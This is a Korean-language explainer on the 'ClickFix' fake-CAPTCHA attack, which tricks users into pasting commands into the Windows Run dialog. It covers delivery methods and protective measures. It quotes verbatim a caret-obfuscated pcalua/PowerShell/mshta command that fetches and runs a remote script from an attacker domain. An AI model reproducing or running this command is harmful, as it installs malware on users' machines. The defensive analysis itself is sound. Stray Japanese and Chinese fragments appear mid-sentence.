ClickFix 캡차 멀웨어 공격 이해하기
ClickFix 캡차 멀웨어 공격 이해하기
ClickFix 공격 벡터
"ClickFix" 공격은 악의적인 행위자가 기술적 수정 또는 보안 검증의 가장 아래에서 사용자가 자신의 머신에서 코드를 수동으로 실행하도록 속이는 사회 공학 기법입니다. Hacker News에 보고된 최근 사건에서, 합법적인 뉴스 블로그를 방문한 사용자는 인간이임을 증명하기 위해 "수동 검증 단계"를 요청하는 가짜 CAPTCHA 페이지를 마주쳤습니다.
이 단계는 일반적으로 사용자에게 다음과 같이 지시합니다:
- Win + R 누르기 (Windows Run dialog 열기).
- Ctrl + V 누른 후 Enter 누르기 (클립보드에서 명령을 붙여넣고 실행).
이 방법은 사용자에게 브라우저 외부에서 명령을 실행하도록 명시적으로 지시함으로써 전통적인 브라우저 보안 샌드박스를 우회하는 데 사용되며, 이로 인해 맬웨어가 운영 체제에 관리자 또는 사용자 수준의 접근 권한을 얻게 됩니다.
악성 페이로드 분석
보고된 사례에서, 사용자의 클립보드에 복사된 페이로드는 원격 스크립트를 다운로드하고 실행하도록 설계된 PowerShell 명령이었습니다:
pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi
공격에 대한 기술 분석에서 여러 가지 정교한 특성이 드러났습니다:
- 난독화: 명령어는 URL과 명령 문자열을 난독화하기 위해 캐럿 기호(
^)를 사용하며, 이로 인해 간단한 패턴 매칭 보안 도구가 탐지하기 어려워집니다. - 동적 전달: 피싱 페이지는 종종
srcDoc을 통해 생성된iframe을 통해 전달되며, 이는 일부 스캐너에서 악성 콘텐츠를 숨길 수 있습니다. - 블록체인 기반 실행: 이 공격의 일부 버전은 매우 복잡하며, 실행하기 위해 이더리움 또는 Base 스마트 계약에서 JavaScript 스크립트를 가져오므로 공격자는 지속적이고 분산된 명령 및 제어(C2) 인프라를 유지할 수 있습니다.
- 지속성: 공격은 페이지 로드 시마다 평가되는 스크립트를 저장하기 위해
LocalStorage를 사용할 수 있으며,これにより 초기 드로퍼가 실행된 후에도 맬웨어가 지속되도록 보장합니다.
일반적인 전달 방법
이러한 공격은 종종 해킹된 콘텐츠 관리 시스템(CMS)인 WordPress와 같은 것을 통해 또는 악성 광고(malvertising)를 통해 합법적이지만 손상된 웹사이트를 통해 자주 전달됩니다. 사용자는 이전에 여러 번 방문했던 블로그나 뉴스 사이트에서 이러한 가짜 CAPTCHA를 마주칠 수 있으며, 이로 인해 공격이 더 신뢰할 수 있게 보일 수 있습니다.
다른 공격 경로는 다음과 같습니다:
- SEO 중독: 검색 엔진 결과 상단에 나타나는 악성 링크로, 때때로 공식 소프트웨어 다운로드(예: 가짜 Claude AI 설치 프로그램)로 위장됩니다.
- 손상된 브라우저 확장 프로그램: 광범위한 권한을 가진 악성 확장 프로그램은 사용자가 방문하는 모든 페이지에 이러한 피싱 프레임을 주입할 수 있습니다.
자신을 보호하는 방법
CAPTCHA 또는任何 웹사이트 검증 프로세스가 Windows Run dialog 또는 터미널을 통해 코드 실행을 요구할 합법적인 이유는 없습니다. 웹사이트가 "인간임을 확인"하기 위해 명령을 실행하도록 요청한다면, 그것은 사기입니다.
즉각적인 방어 조치
- 웹사이트에서 제공하는 명령을 시스템 터미널 또는 Run dialog에서 절대 실행하지 마세요.
- Google Safe Browsing와 같은 서비스에 피싱 도메인을 신고하고, 의심스러운 파일이나 URL을 VirusTotal에 업로드하세요.
장기 보안 계층
- 광고 차단기 사용: uBlock Origin과 같은 도구는 이러한 공격을 전달하는 데 사용되는 많은 악성 스크립트 및 광고 네트워크를 차단할 수 있습니다.
- DNS 필터링: 보안에 중점을 둔 DNS 제공업체(예: Quad9) 또는 차단 목록이 있는 로컬 리졸버(예: Pi-hole)를 사용하면 브라우저가 알려진 악성 도메인에 연결되는 것을 방지할 수 있습니다.
- 최종 사용자 경계심: 비정상적인 브라우저 행동에 대해 회의적인 태도를 유지하세요. 사이트가 시스템 수준 권한이나 수동 명령 실행을 요청하면 보안 위협으로 간주하세요.